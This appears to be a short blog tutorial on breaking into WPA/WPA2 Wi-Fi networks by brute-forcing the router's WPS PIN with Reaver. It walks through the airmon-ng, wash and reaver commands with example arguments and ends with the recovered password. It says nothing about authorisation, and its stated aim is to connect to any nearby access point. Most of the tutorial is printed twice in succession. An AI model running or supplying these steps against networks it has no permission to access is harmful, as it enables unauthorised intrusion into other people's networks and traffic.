At the time of this writing, there is no easy way to crack WPA password. WEP was a child's play but you wouldn't find routers configured to have this for security nowadays.
The only easier way to crack a router with WPA/WPA2 protocol is to exploit the WPS. WPS is an 8-digit PIN configured in your router which allows users to connect without selecting the SSID and knowing the Wifi password.
Common routers will have the WPS enabled. So if it is enabled and you're able to guess the PIN, you're good to go!
Reaver is an automated tool you can use to guess to WPS PIN. Once it knows the WPS PIN, it will then proceed to cracking the Wifi password. Just make sure that you have good signal of the Wifi or access point you want to connect to.
Let's get started!
1. First, we want to switch our wireless adapter into Monitoring mode. We can do that by opening the Terminal and typing the following command:
> airmon-ng start wlan0
airmon-ng is the application we will use to turn on the monitor mode.
start command to start it. Monitoring mode makes you able to listen to the Wifi traffic around you.
wlan0 is your wireless adapter. You can find this using the command ifconfig.
2. Then, once you're on Monitor mode, you can watch out for any Wifi within your area with WPS enabled. Do it using this command:
> wash -i wlan0mon
wash is a WPS scan tool.
-i is the switch we used to input our wireless adapter in Monitor mode
wlan0mon is our wireless adapter in Monitor mode
After running this command, you're screen will list all the access points to test.
For your selected Access Point, note down the BSSID and the channel number.
3. Now we launch Reaver! Hit Ctrl+C if you've already selected an access point to test. This will stop Wash from scanning. Then type this command:
> reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f
example:
> reaver -i wlan0mon -b 00:11:22:33:44:55 -c 11 -vvv -K 1 -f
4. Now wait for it to display the WPA password for you.
Sorry for the lack of images. I will follow up on that.
The only easier way to crack a router with WPA/WPA2 protocol is to exploit the WPS. WPS is an 8-digit PIN configured in your router which allows users to connect without selecting the SSID and knowing the Wifi password.
Common routers will have the WPS enabled. So if it is enabled and you're able to guess the PIN, you're good to go!
Reaver is an automated tool you can use to guess to WPS PIN. Once it knows the WPS PIN, it will then proceed to cracking the Wifi password. Just make sure that you have good signal of the Wifi or access point you want to connect to.
Let's get started!
1. First, we want to switch our wireless adapter into Monitoring mode. We can do that by opening the Terminal and typing the following command:
> airmon-ng start wlan0
airmon-ng is the application we will use to turn on the monitor mode.
start command to start it. Monitoring mode makes you able to listen to the Wifi traffic around you.
wlan0 is your wireless adapter. You can find this using the command ifconfig.
2. Then, once you're on Monitor mode, you can watch out for any Wifi within your area with WPS enabled. Do it using this command:
> wash -i wlan0mon
wash is a WPS scan tool.
-i is the switch we used to input our wireless adapter in Monitor mode
wlan0mon is our wireless adapter in Monitor mode
After running this command, you're screen will list all the access points to test.
For your selected Access Point, note down the BSSID and the channel number.
3. Now we launch Reaver! Hit Ctrl+C if you've already selected an access point to test. This will stop Wash from scanning. Then type this command:
> reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f
example:
> reaver -i wlan0mon -b 00:11:22:33:44:55 -c 11 -vvv -K 1 -f
4. Now wait for it to display the WPA password for you.
Sorry for the lack of images. I will follow up on that.